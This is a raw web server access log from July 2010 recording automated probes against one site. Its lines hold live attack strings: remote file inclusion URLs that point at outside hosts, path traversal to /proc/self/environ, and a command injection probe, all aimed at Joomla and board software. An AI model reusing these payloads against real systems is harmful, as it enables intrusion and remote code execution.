216.246.2.35 - - [31/Jul/2010:08:00:34 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.246.2.35 - - [31/Jul/2010:08:00:56 -0700] "GET /logs/access_100503.log//appserv/main.php?appserv_root=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:08:01:15 -0700] "GET /logs/access_100325.log%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:08:02:45 -0700] "GET /logs/access_100513.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:08:02:45 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:08:02:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
209.34.196.162 - - [31/Jul/2010:08:03:19 -0700] "GET /include/footer.php?_path[counter]=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:08:05:28 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:05:36 -0700] "GET /logs/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:05:44 -0700] "GET /logs/access_100214.log%20%20/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.150.248.195 - - [31/Jul/2010:08:05:52 -0700] "GET /index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.811" "www.puaga.com"
222.255.121.216 - - [31/Jul/2010:08:07:02 -0700] "GET ///write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.255.121.216 - - [31/Jul/2010:08:07:02 -0700] "GET /logs////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.255.121.216 - - [31/Jul/2010:08:07:02 -0700] "GET /logs/access_100212.log////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.55.136.163 - - [31/Jul/2010:08:07:22 -0700] "GET /logs//index.php?option=com_ponygallery&Itemid=&mosConfig.absolute.path=http://ins.fileave.com/Bot/Ckrid1.txt?? HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
201.55.136.163 - - [31/Jul/2010:08:07:22 -0700] "GET /index.php?option=com_ponygallery&Itemid=&mosConfig.absolute.path=http://ins.fileave.com/Bot/Ckrid1.txt?? HTTP/1.1" 200 3640 "-" "MaMa CaSpEr" "www.puaga.com"
222.255.121.216 - - [31/Jul/2010:08:07:22 -0700] "GET /logs/access_100319.log////write_comment.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.55.136.163 - - [31/Jul/2010:08:07:23 -0700] "GET /index.php?option=com_ponygallery&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 3640 "-" "MaMa CaSpEr" "www.puaga.com"
201.55.136.163 - - [31/Jul/2010:08:07:23 -0700] "GET /logs//index.php?option=com_ponygallery&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
201.55.136.163 - - [31/Jul/2010:08:07:27 -0700] "GET /logs/access_100428.log%20%20//index.php?option=com_ponygallery&Itemid=&mosConfig.absolute.path=http://ins.fileave.com/Bot/Ckrid1.txt?? HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
201.55.136.163 - - [31/Jul/2010:08:07:28 -0700] "GET /logs/access_100428.log%20%20//index.php?option=com_ponygallery&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:08:45 -0700] "GET /logs/access_100504.log///bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:08:45 -0700] "GET /logs/access_100526.log///bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:08:45 -0700] "GET /logs///bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:08:45 -0700] "GET //bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.55.136.163 - - [31/Jul/2010:08:09:07 -0700] "GET /logs/access_100330.log%20%20//index.php?option=com_ponygallery&Itemid=&mosConfig.absolute.path=http://ins.fileave.com/Bot/Ckrid1.txt?? HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
201.55.136.163 - - [31/Jul/2010:08:09:08 -0700] "GET /logs/access_100330.log%20%20//index.php?option=com_ponygallery&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
91.196.124.16 - - [31/Jul/2010:08:09:15 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.196.124.16 - - [31/Jul/2010:08:09:15 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.196.124.16 - - [31/Jul/2010:08:09:15 -0700] "POST /logs/access_100603.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.196.124.16 - - [31/Jul/2010:08:09:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:08:10:45 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:08:10:45 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:08:10:45 -0700] "GET /logs/access_100316.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:08:11:23 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:08:11:23 -0700] "GET /logs/access_100210.log%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:08:11:23 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:12:08 -0700] "GET //bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:12:08 -0700] "GET /logs///bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:12:08 -0700] "GET /logs/access_100526.log%20%20///bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:12:11 -0700] "GET /logs/access_100504.log%20%20///bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.180.89.165 - - [31/Jul/2010:08:12:15 -0700] "GET /logs/access_100224.log HTTP/1.1" 200 1389217 "http://www.puaga.com/logs/access_100224.log" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.puaga.com"
194.150.248.195 - - [31/Jul/2010:08:12:29 -0700] "GET /logs/access_100724.log/index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
194.150.248.195 - - [31/Jul/2010:08:12:29 -0700] "GET /index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.811" "www.puaga.com"
194.150.248.195 - - [31/Jul/2010:08:12:30 -0700] "GET /logs/index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:08:14:56 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:08:14:56 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:08:14:57 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:08:14:59 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:08:15:00 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:08:15:01 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:08:15:01 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:15:17 -0700] "GET /logs/access_100524.log/////skin/board/moviefl/write.skin.php?g4[path]=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:15:20 -0700] "GET /logs/access_100712.log/////skin/board/moviefl/write.skin.php?g4[path]=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:08:15:34 -0700] "GET /logs/access_100314.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:08:15:34 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:08:15:34 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:08:15:48 -0700] "GET /logs/access_100214.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:08:15:48 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:08:15:49 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:52 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:52 -0700] "GET /logs/access_100415.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:52 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:08:15:53 -0700] "GET /logs/access_100511.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:55 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:55 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:55 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:55 -0700] "GET /logs/access_100415.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:55 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:55 -0700] "GET /logs/access_100415.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:55 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:55 -0700] "GET /logs/access_100415.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:15:56 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:16:31 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:16:31 -0700] "GET /logs/access_100415.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:16:31 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:16:32 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:16:32 -0700] "GET /logs/access_100415.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.112 - - [31/Jul/2010:08:16:33 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ackerlink.fileave.com/id1.txt???? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:08:17:02 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:08:17:02 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:08:17:02 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:08:17:03 -0700] "GET /logs/access_100227.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:08:17:14 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:08:17:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:08:17:14 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:08:17:49 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
85.228.98.67 - - [31/Jul/2010:08:17:58 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:08:18:02 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
84.242.142.98 - - [31/Jul/2010:08:18:03 -0700] "GET /index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.65" "www.puaga.com"
84.242.142.98 - - [31/Jul/2010:08:18:37 -0700] "GET /logs/access_100610.log/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
84.242.142.98 - - [31/Jul/2010:08:18:37 -0700] "GET /index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.65" "www.puaga.com"
84.242.142.98 - - [31/Jul/2010:08:18:38 -0700] "GET /logs/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
84.242.142.98 - - [31/Jul/2010:08:18:44 -0700] "GET /logs/access_100626.log/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:08:19:42 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.810" "www.puaga.com"
92.60.176.46 - - [31/Jul/2010:08:19:42 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.810" "www.puaga.com"
114.108.151.149 - - [31/Jul/2010:08:19:54 -0700] "GET /logs/access_100630.log//index.php?option=com_flexicontent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
114.108.151.149 - - [31/Jul/2010:08:19:55 -0700] "GET /index.php?option=com_flexicontent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
114.108.151.149 - - [31/Jul/2010:08:19:56 -0700] "GET /logs//index.php?option=com_flexicontent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:08:20:31 -0700] "GET /logs/access_100313.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.29.171.35 - - [31/Jul/2010:08:20:59 -0700] "GET /logs/access_100210.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
114.108.151.149 - - [31/Jul/2010:08:21:31 -0700] "GET /logs/access_100711.log//index.php?option=com_flexicontent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:23:21 -0700] "GET /logs/access_100222.log/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:08:23:24 -0700] "GET /logs/access_100214.log/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:08:23:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:08:23:53 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:08:23:54 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:08:23:54 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:08:23:54 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:08:23:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:08:23:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:08:23:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
